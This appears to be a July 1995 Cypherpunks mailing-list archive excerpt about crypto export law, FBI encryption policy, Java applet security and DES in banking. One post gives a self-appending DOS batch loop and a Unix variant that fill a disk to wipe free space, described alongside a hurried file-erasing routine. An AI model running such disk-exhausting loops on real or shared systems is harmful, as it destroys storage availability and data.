doesn't have this problem ... yet!! Don't bet on it. If you really try to export top-flight encryption technology in a big way, you may find that your government can be just as opressive as mine. -- -> See: Info-Sec Heaven using our New Super Secure World-Wide-Web Server -> Free: Test your system's security (scans deeper than SATAN or ISS!) ---------------------- both at URL: http://all.net ---------------------- -> Read: "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 ------------------------------------------------------------------------- Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From nobody at REPLAY.COM Fri Jul 28 06:36:32 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 28 Jul 95 06:36:32 PDT Subject: Java, Netscape, OpenDoc, and Babel (NewsClip) Message-ID: <199507281335.PAA27686@utopia.hacktic.nl> Responding to msg by merriman at arn.net (David K. Merriman) on Fri, 28 Jul 3:24 AM >Still tentative, or is there a Web address? The mall will be accessible July 31 from a pointer at http://www.org.com . ---------- OSF Opens Software Web Mall For Java Cambridge, MA, July 26 (NB) -- In a teleconference today, the Open Software Foundation (OSF) unveiled plans to open an Open Software Mall on the Web on July 31, and to start distributing software there this fall that will include Java Ports technology for the Web, DCE (Distributed Computing Environment) Web, and Microkernel Unification Specification, a new technology for building cross-platform applications. At the teleconference, which was attended by Newsbytes, Dr. Ira Goldstein, chief scientist and executive VP, said that the OSF sees the Open Software Mall as a place for users to access and help to beta test new technologies like Java Ports, DCE Web, and Microkernel Unification -- being sponsored by the OSF in conjunction with major vendors -- as well as software from universities and other research collaborators, and eventually, outside "open systems" efforts that are "germane to core OSF technology." Java Ports, a series of ports of Sun's Java technology for the Web, is being produced by the OSF with Sun, Hewlett-Packard, and Novell, Goldstein told the journalists and analysts. The technology will be available on the Open Software Mall in September, he added. DCE Web, an application designed to provide the Web with DCE mechanism for encryption, access control, and naming, is a collaborative project from the OSF, Hitachi, HP and AT&T. DCE Web is "consistent with HTTP and secure HTTP," but able to provide additional services to DCE sites, according to Goldstein. Microkernel Unification -- from the OSF, Hitachi, HP and IBM -- is a technology for building cross-platform databases and other applications by writing directly to a standard, common microkernel application programming interface (API). IBM plans to produce a product that is "mostly compliant" with the new specification in the product's first release, and "completely compliant" in its second release, Goldstein noted. Digital Equipment Corp. might also be participating in the Microkernel Unification specification project, Goldstein reported, adding that he expects to have an answer on this from Digital within a week. >From the OSF's Open Software Mall, users will be able to browse, download, and comment on software executables and software, documentation plans, design documentation, specifications, and commentary in hypertext format, according to Goldstein. The Web mall will also provide Web links to "relevant products, services, education and consulting available from the community," he told the teleconference participants. Java, DCE Web, and Microkernel Unification will each have their own Web stores on the Open Software Mall's ATO (Advanced Technology Offering) Plaza. ATOs are software technology projects, which may or may not lead to productization, where participants seek to minimize risk by obtaining feedback from users, noted the OSF's Peter Shaw. ATO development costs typically range from $300,000 to $600,000. For ATO technologies that become productized, licensing rights are estimated at $25,000 per licensee. The OSF also sponsors other vendor efforts, known as PSTs, in which vendors are closer to "productization" of their work, and development costs tend to be higher, said Shaw. Current PSTs include DCE 1.2 and Motif/CDE (Common Development Environment). In addition, four potential PSTs are "being actively pursued," Shaw maintained. "We expect to have some announcements on these later this week," he added. The PSTs will also be given their own area on the Open Software Mall, to be known as PST Plaza. Aside from the stores for Java, DCE Web, and Microkernel Unification, the ATO Plaza will also include "Web pages for a potpourri of (other) ATOs," according to Goldstein. Additional areas of the Open Software Mall will include "Research Plaza," the Motif/CD Store, and areas for tools, training, and consulting. The mall will officially open next Monday, Goldstein said. Initial offerings will include an explanation of its goals and activities, and the opportunity for user commentary. The mall will be accessible from a pointer at http://www.org.com . (Jacqueline Emigh/19950726/Reader Contact: Open Software Foundation, 617-621-8700; Press Contact: Jane Smeloff, OSF, 617-621-8997) From nsb at nsb.fv.com Fri Jul 28 06:43:59 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 28 Jul 95 06:43:59 PDT Subject: "Only on the Cypherpunks list..." In-Reply-To: <9507271447.AA12988@snark.imsi.com> Message-ID: <0k6CY5SMc50e9Dw4U4@nsb.fv.com> Excerpts from mail: 27-Jul-95 Re: "Only on the Cypherpunk.. "Perry E. Metzger"@imsi. (292) > NetBSD, not FreeBSD. There is also MachTen. Yes, I can attest to the fact that MachTen is *amazing*, particularly its seamless integration of the Mac and UNIX file systems. It's worth getting it even if the only thing you ever use it for is to do "find" and "grep" through your Macintosh files..... -------- Nathaniel S. Borenstein | When privacy is outlawed, Chief Scientist, First Virtual Holdings | only outlaws will have privacy! FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMAN DEFENSE FUND! ---VIRTUAL YELLOW RIBBON-->> zldf at clark.net From chris at deltacom.mindspring.com Fri Jul 28 06:45:08 1995 From: chris at deltacom.mindspring.com (Christopher Smith) Date: Fri, 28 Jul 95 06:45:08 PDT Subject: Quicken's new version Message-ID: If I am out of place for posting here, forgive me; however, I do believe this germane. Compass Bank here in Alabama is joining twenty other banks around the country to offer dial-in banking via Quicken's new software release. Does anyone know or have heard of the security mechanisms which are to be built in to this product, specifically authent and encryption? From meredith at ecid.cig.mot.com Fri Jul 28 06:52:17 1995 From: meredith at ecid.cig.mot.com (Andrew D Meredith) Date: Fri, 28 Jul 95 06:52:17 PDT Subject: Hooks to Crypto> In-Reply-To: <9507281300.AA22773@all.net> Message-ID: <9507281450.ZM15992@jurua.sweng.ecid.cig.mot.com> On Jul 28, 2:09pm, Dr. Frederick B. Cohen wrote: > Subject: Re: Hooks to Crypto> > ... > > > Actually, neither hooks nor encryption are unexportable, you > > > just need a license to export them. > ... > > > I hope I'm not alone in wondering why on earth this is the case. > > They don't want to encourage encryption if they can avoid it. It > impairs their ability to gather intelligence. I kind of meant "why they think they can" rather than "why they want to". One can't really help being aware these days what the US government (and indeed many others) are trying to do. > Legal? What makes you think so? It hasn't made it to the courts yet Oh ... I see ... just like the rest of this stuff, only more so. > because people in the US aren't willing to risk jail for over their > right to do it. The only court case I am aware of was the RSA case > and in that one, the courts ruled against the NSA - but in today's > political and economic environment, people who do cryptography > don't want to risk it. Judging by the PZ case, I can't say as I can really blame them. it would be better of course if they would go for it, but ... > > The hooks are of course completely useless in and of themselves. > > You can only do anything useful with them if you have the > > matching crypto package. > > Not really right. It's very easy to change a compression hook > into an encryption hook using standard off-the-shelf shareware, > public domain software, or commercial products. I probably should have written "a crypto package" instead of "the matching crypto package". This would infer that anything that can cause information to be piped out to a package and then the result sucked back in would fall into this category. Hmmm map ^Xe :,$! /bin/sh -c 'pgp -feast 2>/dev/tty^V|^V|sleep 4'^M^L Everyone DELETE VI NOW !!! >;) > > Yours a confused Brit ... who doesn't have this problem ... yet!! > > Don't bet on it. If you really try to export top-flight encryption > technology in a big way, you may find that your government can be > just as opressive as mine. Our lot tend to work in a different way to yours. Similar end result of course, but different approach. So when I said "yet". I was meaning that, at the moment, we have no laws specifically refering to Cryptography and it's export, but the approach I can see being taken would be: 1 - Find yourself a tenuous link with some Psycho-Baby-Killer group. 2 - Start a "This must be stopped" campain. 3 - Propose the "Internet Pornography Act" 4 - Shove it through before anyone can get together enough opposition to get it squashed. (and that would have to be a GREAT DEAL of opposition). That's how they did the "Criminal Justice Act" which breaks both European and International law in a great many places. That's how they'll do the "Internet Pornography Act". It'll be just loose enough to include just about anything they want it to. >-- End of excerpt from Dr. Frederick B. Cohen Andy M From alan.pugh at internetmci.com Fri Jul 28 07:02:25 1995 From: alan.pugh at internetmci.com (alan pugh) Date: Fri, 28 Jul 95 07:02:25 PDT Subject: http://www2.pcy.mci.net/whats-new/editors/meeks/index.html Message-ID: <01HTEDK5W95U8WWCLS@MAILSRV1.PCY.MCI.NET> mostly old news for the readers here, but relevant to the list. this was found at the net editors off of mci's webpage. > > The Assault on Private Encryption > > by Brock N. Meeks > > Washington, DC -- The other shoe has dropped now, several times. > > The political backlash and emotional fallout of the bombing of the > federal building in Oklahoma City still lingers here. FBI Director > Louis Freeh is using that event as a lever to wage a kind of private > war against the use of private encryption schemes. > > According to Administration sources, several different proposals are > now being discussed on how the government might go about implementing > a policy of government mandated, government "certified" encryption. > The most hardline of these proposals would outlaw your ability to > choose an encryption scheme which the government couldn't break, under > the authority of a court order. > > Freeh has left no doubts that his next target -- after successfully > getting Congress to pass the $500 million Digital Telephony Bill, > which gives law enforcement agencies an "easy access" method of > eavesdropping on telephone conversations-- his is private encryption. > > During an appropriations hearing in May, Freeh told a congressional > panel: "[W]e're in favor of strong encryption, robust encryption. The > country needs it, industry needs it. We just want to make sure we have > a trap door and key under some judge's authority where we can get > there if somebody is planning a crime." > > That means an end any non-government approved encryption technology > that doesn't have some means of providing the Feds with it's treasured > "back door." Under this scheme, for example, the widely-used Pretty > Good Privacy (PGP) encryption program would be, essentially, illegal > to own or at least, illegal for a U.S. citizen to use inside U.S. > borders. > > Private encryption schemes allow a person to scramble an electronic > message so that, if intercepted by an unintended party, it is rendered > unreadable. These scrambling programs are useful to a wide range of > people and interests, including researchers that want to keep their > proprietary breakthroughs safe from prying eyes to corporations > sending trade secrets to a distant office across the Net to ordinary > folks sending a steamy love letter to a lover. > > But these same encryption programs are being used by "terrorists and > international drug traffickers," as well, claims FBI Director Freeh, > and that makes private encryption schemes a threat to national > security. > > Freeh's crusade against encryption is being backed by been joined the > Justice Department, with the gleeful back alley goading of the > nation's top spook group, the National Security Agency. > > To meet the "challenges of terrorism," Freeh said, several things must > be done, among them, deal with "encryption capabilities available to > criminals and terrorists" because such technology endangers "the > future usefulness of court-authorized wiretaps. This problem must be > resolved." > > While Freeh has used the Oklahoma City bombing as convenient "news > hook" to again make a pitch to "resolve" the private encryption > "problem," the Director was basically reading from a dog-eared script. > Within the last several months he has repeatedly testified publicly > before Congress about the "evils" of encryption. > > On March 30 the House Judiciary Committee's Subcommittee on Crime he > said: > > "Even though access is all but assured [by the passage of the Digital > Wiretap Act] an even more difficult problem with court-authorized > wiretaps looms. Powerful encryption is becoming commonplace. The drug > cartels are buying sophisticated communications equipment.... This, as > much as any issue, jeopardizes the public safety and national security > of this country. Drug cartels, terrorists, and kidnappers will use > telephones and other communications media with impunity knowing that > their conversations are immune from our most valued investigative > technique." > > Then during a May 3 appearance before the same Committee, Freeh said: > "Encryption capabilities available to criminals and terrorists, both > now and in days to come, must be dealt with promptly. We will not have > an effective counterterrorism strategy if we do not solve the problem > of encryption." > > But there's nothing to be alarmed at here, according to Freeh. Just > because he's asking the Congress and the White House to strip you of > the right to choose how you scramble your messages, using a program > that the government doesn't hold all the keys too, doesn't mean that > the Director isn't a sensitive guy or that he has suddenly taken a > liking to wearing jackboots. > > Freeh steadfastly maintains all these new powers he's asking for are > simply "tools" and "not new authorities." These new powers are "well > within the Constitution," Freeh told Congress. > > Freeh hasn't publicly outlined just how he proposes to "resolve" the > "encryption problem." However, according to an FBI source, several > plans are in the works. The source refused to detail any specific > plan, but added: "Let's just say everything is on the table." Does > that include outlawing private encryption schemes? "I said > 'everything,'" the source said. > > The encryption debate has been raging for years. Two years ago the > Clinton Administration unveiled a new policy in which it proposed to > flood the market with its own home-grown encryption devices -- a > product of the National Security Agency -- called the "Clipper Chip." > > The Clipper is based on a "key-escrow" system. Two government agencies > would hold the keys "in escrow", which are unique to each chip, in a > kind of "data vault." Any time the FBI-- or your local sheriff -- > wanted to tap your phone conversations, they would have to ask a judge > to give the two government agencies to turn over the keys to you > Clipper chip. With those keys, the FBI could then unscramble any of > your conversations at will. > > That policy raised a huge firestorm of controversy and the Clipper > sunk from sight, down, but not out. The intent of the White House, > acting as a front man for the NSA and other intelligence agencies > along with the FBI, was to have Americans adopt Clipper voluntarily From fc at all.net Fri Jul 28 07:07:28 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Fri, 28 Jul 95 07:07:28 PDT Subject: Hooks to Crypto In-Reply-To: <9507281450.ZM15992@jurua.sweng.ecid.cig.mot.com> Message-ID: <9507281401.AA26689@all.net> ... > > because people in the US aren't willing to risk jail for over their > > right to do it. The only court case I am aware of was the RSA case > > and in that one, the courts ruled against the NSA - but in today's > > political and economic environment, people who do cryptography > > don't want to risk it. > > Judging by the PZ case, I can't say as I can really blame them. it > would be better of course if they would go for it, but ... In my case, I just opted to moving my crypto business outside the US. This is the real result of the crypto policy. The US is falling behind the rest of thew world in crypto R+D. For example, two good crypto packages for the Internet have been released in the last few months. I was engaged in a similar project in the late 80s but abandoned it because I couldn't export, so the market would not justify the work. Now it is owned by people in EC and Australia who are generous enough to allow those of us in the US to use them. Of course, I can't post them in info-sec heaven because even imported crypto software may not be exported, and I cannot adequately detect the difference between a foreign person using a US site to get the information and a legitimate US site getting the information for itself. In other words, the policy prevents US firms from having better Internet resources in the info-sec arena. ... > This would infer that anything that can cause information to be piped > out to a package and then the result sucked back in would fall into > this category. Right - in other words, nothing can be exported if it produces output and takes input. The point is, they want a way to arrest people who are doing something they don't like. Philo Zimmerman would almost certainly win if they ever took him to court, but by harassing him in this more subtle way, they destroy the impact of PGP in the marketplace, get MIT to support an official (and perhaps customized for the NSA to have weak keys) version, and prevent others from following in Phil's footsteps. So the strategy works until some brave person risks enough top get past it. ... > 1 - Find yourself a tenuous link with some Psycho-Baby-Killer group. > 2 - Start a "This must be stopped" campain. > 3 - Propose the "Internet Pornography Act" > 4 - Shove it through before anyone can get together enough > opposition to get it squashed. (and that would have to be a > GREAT DEAL of opposition). > > That's how they did the "Criminal Justice Act" which breaks both > European and International law in a great many places. That's how > they'll do the "Internet Pornography Act". It'll be just loose enough > to include just about anything they want it to. All true, but as the saying goes: Representative democracy is a terrible form of government, but every other form of government we know of is even worse. -- -> See: Info-Sec Heaven using our New Super Secure World-Wide-Web Server -> Free: Test your system's security (scans deeper than SATAN or ISS!) ---------------------- both at URL: http://all.net ---------------------- -> Read: "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 ------------------------------------------------------------------------- Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From perry at imsi.com Fri Jul 28 07:12:00 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 28 Jul 95 07:12:00 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <199507280729.DAA01649@clark.net> Message-ID: <9507281410.AA07271@snark.imsi.com> Ray Cromwell writes: > > Just a quick note to chime in. The OSF just did a deal with Sun > to port Java to several platforms. The OSF is opening a "web mall" > where you can grab software objects and run them. Expect to Java > *really* take off in about 2-3 months. Every business on the net is going > to want a Java shopping-client-basket on their web-mall/web-store. > (Web Consultants! Learn Java!) As a security consultant, I'm very happy about Java because once the holes are found in it and massive, Morris style worms are launched with it, I'll be laughing all the way to the bank. I exagerate only slightly. I don't believe Java to be secure, in spite of the claims. Its too complicated, and it operates in an environment who's correct operation is required for it to remain secure. Good system design says that you want a system's failure mode to produce a secure result, but thats not what Java does. Perry From andrew_loewenstern at il.us.swissbank.com Fri Jul 28 08:00:11 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 28 Jul 95 08:00:11 PDT Subject: Banks and Crypto - Again Message-ID: <9507281459.AA03673@ch1d157nwk> > Critics say that the longer DES is used, the more likely its code > could be broken. While realizing this could limit its life span > as a government certified standard, ABA warned that requiring banks > to convert to a new standard by 1998 (the year DES's certification > expires) could be prohibitively costly due to the high level of > electronic funds transfers secured by DES. ABA therefore encouraged > the National Institute for Standards and Technology (NIST) to > continue to endorse DES as a Federal Information Processing Standard > (FIPS) for use by the financial community. "Breaking DES keys in a reasonable amount of time could be prohibitively costly for Banks due to the high level of electronic funds transfers secured by DES." andrew From solman at MIT.EDU Fri Jul 28 08:03:54 1995 From: solman at MIT.EDU (solman at MIT.EDU) Date: Fri, 28 Jul 95 08:03:54 PDT Subject: Java, Netscape, OpenDoc, and Babel (NewsClip) In-Reply-To: <199507281335.PAA27686@utopia.hacktic.nl> Message-ID: <9507281503.AA22612@ua.MIT.EDU> Based on the recently posted announcement, it is not at all clear that the following is accurate: The OSF is opening a "web mall" > where you can grab software objects and run them Can somebody confirm or deny this? It makes a big difference. A few additional ports won't significantly enhance Java's adoption as the standard for secure interplatform network transport of executables. This has been a done deal since Netscape announced that it was licensing and Sun committed to Mac and Win95 ports. On the other hand, a Java object brokerage service sponsored by OSF including a few basic object support services could make a substantial difference in the pace at which Java class libraries develop. JWS From rsalz at osf.org Fri Jul 28 08:05:55 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 28 Jul 95 08:05:55 PDT Subject: Java, Netscape, OpenDoc, and Babel Message-ID: <9507281504.AA06867@sulphur.osf.org> >Just a quick note to chime in. The OSF just did a deal with Sun >to port Java to several platforms. The OSF is opening a "web mall" >where you can grab software objects and run them. Well, not quite. The "Open Mall" is part of OSF's new advanced technology offerings. Free source for non-commercial use, fetchable from the Open Mall, a Web server. You'll be able to find the mall (in a week or two) from OSF's home page, http://www.osf.org/. The Java ATO includes ports to SVR4 (dunno whose) and HP, and more importantly, a study of the security aspects and implications of Java: is it truly a "safe" language to write in? And what does safe mean, and for whom (server, client, user, hardware, etc)? The study will be a paper, also avail from the mall. See http://www.osf.org/comm/press/950276-ato.html for mroe details. /r$ From asb at nexor.co.uk Fri Jul 28 08:24:02 1995 From: asb at nexor.co.uk (Andy Brown) Date: Fri, 28 Jul 95 08:24:02 PDT Subject: Hooks to Crypto In-Reply-To: <9507281401.AA26689@all.net> Message-ID: On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote: > Philo Zimmerman would almost certainly > win if they ever took him to court, but by harassing him in this more > subtle way, they destroy the impact of PGP in the marketplace, get MIT > to support an official (and perhaps customized for the NSA to have weak > keys) version, I've personally pulled apart the innards of both MIT pgp 2.6.2 and the non-MIT pgp 2.6.2i in order to generate large primes and full RSA keys. There are no hacks in MIT pgp that cause it to generate weak keys. - Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From solman at MIT.EDU Fri Jul 28 08:25:43 1995 From: solman at MIT.EDU (solman at MIT.EDU) Date: Fri, 28 Jul 95 08:25:43 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281410.AA07271@snark.imsi.com> Message-ID: <9507281525.AA22734@ua.MIT.EDU> |> As a security consultant, I'm very happy about Java because once the |> holes are found in it and massive, Morris style worms are launched |> with it, I'll be laughing all the way to the bank. |> I exagerate only slightly. I don't believe Java to be secure, in spite |> of the claims. Its too complicated, and it operates in an environment |> who's correct operation is required for it to remain secure. Good |> system design says that you want a system's failure mode to produce a |> secure result, but thats not what Java does. I disagree for the simple reason that Java and Hotjava are not being treated as trusted code in their applications. Applets are tightly contrained in what they can do, and hotjava's default attempt to configure a "firewall" when it boots up is not likely to engender a false sense of security. I've been looking at the Java code closely for a couple of months now, and I find it to be relatively clean in its implementation (Solaris version at least). I think the biggest worry might be holes in the non-Sun ports along the host machine interfaces. Overall, I give the Solaris implementation extremelly high marks in terms of its security. I think I'm actually more worried by far less powerful browsers whose code I don't approve of, like Mosaic. The vast majority of security problems result from the fact that most code has security added in AFTER coding starts. Java has been designed for excellent security from the very begining. JWS From perry at imsi.com Fri Jul 28 08:30:53 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 28 Jul 95 08:30:53 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281525.AA22734@ua.MIT.EDU> Message-ID: <9507281530.AA18869@snark.imsi.com> solman at MIT.EDU writes: > I disagree for the simple reason that Java and Hotjava are not being > treated as trusted code in their applications. Applets are tightly > contrained in what they can do, You are incorrect. Applets are DESIGNED to be tightly constrained in what they do. You want to bet your career that there are no bugs in the implementation of this design? The thing keeping you from opening sockets or doing file-io is a very thin scrim. Are you *certain* that it is bug free? I'm not. > I've been looking at the Java code closely for a couple of months now, and > I find it to be relatively clean in its implementation (Solaris version at > least). Are you willing to bet your career that its bug free? Thats my question. > I think I'm actually more worried by far less powerful browsers > whose code I don't approve of, like Mosaic. Don't get me wrong -- Mosaic also bothers me, as does Netscape. Java, however, gives me the willies. > The vast majority of security problems result from the fact that > most code has security added in AFTER coding starts. Java has been > designed for excellent security from the very begining. *designed*. Can you be certain that both the design and the implementation are bug free? I like systems that are more fail-safe. About half a dozen simultaneous bugs would be needed to break some of my more secure firewalls, for example. Java does *not* provide security in depth. .pm From sunder at escape.com Fri Jul 28 08:46:08 1995 From: sunder at escape.com (Ray Arachelian) Date: Fri, 28 Jul 95 08:46:08 PDT Subject: Hooks to Crypto (was Re: NSA and the NCSA/Apache web servers) In-Reply-To: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com> Message-ID: On Fri, 28 Jul 1995, Andrew D Meredith wrote: > On Jul 28, 12:18pm, Dr. Frederick B. Cohen wrote: > > Subject: Re: NSA and the NCSA/Apache web servers > > > Actually, neither hooks nor encryption are unexportable, you > > just need a license to export them. The answer is to have some non-USA entity build shareable full fledged full powered crypto libraries and provide them for free for the rest of the world and for all machines. On Windoze DLL's or WIN32's would be needed, on PPC Mac's shared Lib's, on 68K Macs, an INIT that hooks itself via Gestalt, on Unix, shared LIB's, etc. I would also include routines for asking the user for a passphrase to prevent the running application from grabbing that password and providing weak security. Or a program running in the background that handles all the calls via IAC's or whatever... (like AppleEvents to PGP) All with full free source, etc and PGP compatibility, etc. Then the rest of us could write code that uses that library. Whoever wants crypto just downloads the library from whereever and uses it. In this case, would code written in the USA be exportable? Wei's library would have been perfect for something like this... too bad. :-( =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From zoo at armadillo.com Fri Jul 28 08:53:36 1995 From: zoo at armadillo.com (david d `zoo' zuhn) Date: Fri, 28 Jul 95 08:53:36 PDT Subject: Java, Netscape, OpenDoc, and Babel Message-ID: <199507281554.KAA08561@monad.armadillo.com> [ Web Mall, OSF, Java, ports, etc] // See http://www.osf.org/comm/press/950276-ato.html for mroe details. Actually, try http http://www.osf.org/comm/press/950726-ato.html instead. From sunder at escape.com Fri Jul 28 09:08:55 1995 From: sunder at escape.com (Ray Arachelian) Date: Fri, 28 Jul 95 09:08:55 PDT Subject: PS/2 passwd bypassed at bootup? In-Reply-To: Message-ID: Never heard of such a disk. However, I'm not sure it can be disabled as it's in CMOS, and it the PS/2 (Half a personal computer?) I remember with this password crap didn't even do a floppy seek, so if they don't read the A: drive, how can there by a boot admin disk? (I may be wrong, but that's what I remember.) =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From sunder at escape.com Fri Jul 28 09:09:43 1995 From: sunder at escape.com (Ray Arachelian) Date: Fri, 28 Jul 95 09:09:43 PDT Subject: mac share/freeware app for overwriting unused hd space? In-Reply-To: Message-ID: On Thu, 27 Jul 1995, Timothy C. May wrote: > At 2:27 PM 7/27/95, j. ercole wrote: > >Can anyone point me towards a program that's freeware or shareware that > >will overwrite all the unused i.e., "trashed" space on my hard drive(s)? I > >sincerely apologise if this is a faq. I know norton's will do it but I > >don't presently have that installed on my machine. Thanks oodles, Something could be written to just write a bunch of random garbage to a file until the volume runs out of free space, then overwrite that file several times before deleting it. I think this is what MacTools's Trashback - EraseFreeSpace option does. I used to do this for DOS machines with a batch file: Type this is at the DOS prompt (for those who use DOS): COPY CON FILLDRIVE.BAT @ECHO OFF @DIR >>KILLME.TXT @TYPE KILLME.TXT >>KILLME.TXT @FILLDRIVE.BAT (hit RETURN ON THIS LINE AND THEN HOLD CONTROL AND HIT Z, and RETURN again.) Just run this until you see hard drive full errors. This creates an exponentially increasing file called "KILLME.TXT" by copying that file to itself on each pass. First pass the file is the size of the directory, the second pass, it's 3 times the size, the third pass 7 times, the fourth pass, it's 15 times, etc. When your finnally run out of space, hit CONTROL-BREAK and then delete the KILLME.TXT file to release the free space. Basically, no matter who I work for, I write a batch file that zaps the SecureDevice file on the root directory, then runs this thing, so if I have to leave the place in a hurry I can erase my personal files without much hassle and little danger of having them compromised. (I also have a few other neat tools to let me know if someone has been snooping on my machine at work, but I won't disclose those :-) Do this a few times and everything is cool. Off the top of my head, the unix equivalent would be: ls -l >>killme.txt cat killme.txt >>killme.txt filldrive But be careful not to run this when other folks are on, or if you're not the sysadmin as you'll overrun your quota very quickly. (The above wasn't tested, and I'm not sure if under unix you can append a file to itself, etc. so #include > At the most serious level of attack (the "threat model"), such as the FBI > labs in Quantico or the NSA, there are reports that specialized disk drive > heads are used to recover earlier signals that are not erased even with N > active overwrite steps (apparently the head jitter in most drives means > that each write cycle is slightly different, even on the same disk region, > and a slight "shadow" or "ghost" of previous writes can sometimes be > extracted). In this day and age drives are getting smaller and smaller while the capacity increases. This means the tracks are smaller and the data spill caused by the jitter is smaller and smaller tending towards almost useless. I really think our TLA friends are having a harder time at this than usual. But suffice to say I still do a wipe three or four times anyway. i.e. It's easy to do something like this on a 5.25" full height 40MB MFM drive, but on a 4GB 3.5" LPS drive, much, much harder. (I guess though, I must be paranoid though as I did buy a nice big bulk eraser built for floppies. ) > --Tim May, who hopes this will not reignite the thread about how to use > thermite to permanently erase disk drives Ditto. =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From solman at MIT.EDU Fri Jul 28 09:16:00 1995 From: solman at MIT.EDU (solman at MIT.EDU) Date: Fri, 28 Jul 95 09:16:00 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281530.AA18869@snark.imsi.com> Message-ID: <9507281615.AA23005@ua.MIT.EDU> Thus spake Perry: |> solman at MIT.EDU writes: |> > I disagree for the simple reason that Java and Hotjava are not being |> > treated as trusted code in their applications. Applets are tightly |> > contrained in what they can do, |> You are incorrect. Applets are DESIGNED to be tightly constrained in |> what they do. You want to bet your career that there are no bugs in |> the implementation of this design? The thing keeping you from opening |> sockets or doing file-io is a very thin scrim. Are you *certain* that |> it is bug free? I'm not. What's with the facetious questions? Only an idiot would guarantee a piece of software to be error free. I am highly confident that there is very little probability of a raider applet doing significant damage. That's as much as I can say of any of of any of the systems I use... and its saying alot given that the thing is executing code it pulls off the net. Is there still room for cleaner code? Definitely, and I think we'll see some of it as Java goes Beta and then production. |> I like systems that are more fail-safe. About half a dozen |> simultaneous bugs would be needed to break some of my more secure |> firewalls, for example. Java does *not* provide security in depth. I think that the high level architecture of Java provides as much security as such a product can possibly provide. By the time Java becomes widely distributed (it is still in Alpha3), I expect it to have features that deny access to any applet not signed by somebody in a list the user creates, a sort of web of trust. On top of this layer, Java already offers rudimentary firewalls. The combination of these layers should be quite effective. Of course, Netscape will probably find a way to screw their implementation up :) JWS From rjc at clark.net Fri Jul 28 09:24:38 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 28 Jul 95 09:24:38 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281410.AA07271@snark.imsi.com> Message-ID: <199507281624.MAA11581@clark.net> > > > Ray Cromwell writes: > > > > Just a quick note to chime in. The OSF just did a deal with Sun > > to port Java to several platforms. The OSF is opening a "web mall" > > where you can grab software objects and run them. Expect to Java > > *really* take off in about 2-3 months. Every business on the net is going > > to want a Java shopping-client-basket on their web-mall/web-store. > > (Web Consultants! Learn Java!) > > As a security consultant, I'm very happy about Java because once the > holes are found in it and massive, Morris style worms are launched > with it, I'll be laughing all the way to the bank. Holes have already been found in CERN HTTP. The GETS() style bug was in the first few versions allowing attacks to overwrite the process stack. Any mail server written in perl is susceptible to weird attacks. For instance, if you ever eval/exec any variable that is double-quoted, rather than single quoted, it is possible to run shell commands via backtics or shell subprocesses in variable names. In fact, can you even prove that elm or pine don't have some obscure bug wherein a certain message, say with malformed headers, can overwrite the stack and allow Morris style attacks? The "Good Times" virus may actually be possible. Security is very nice to have. it's nice to rely on. But sometimes there's a need for some liberty. Make everything as secure as you can, but if security prevents you from doing something that you want to do, it's not helping you. The internet would be a very cold and barren place if the only application people ran was mail. Object Oriented Superdistributed components are so useful an abstraction, I think it's worth the security risk. HotJava solves some fundamental issues with protocols. Right now the W^3 working groups have been struggling to define URI/URCs and a whole host of other web protocols. They've been doing it for years, but they suffer from Xanadu like problems as far as I can tell. They don't want to saddle the web with a bad protocol, so they search to define a perfect one. Hence, no prototypes are ever deployed, because if they were, the user community might make them a defacto standard and lock them into it much like MS-DOS locked PCs into the Dark Ages. With Java, you define all the 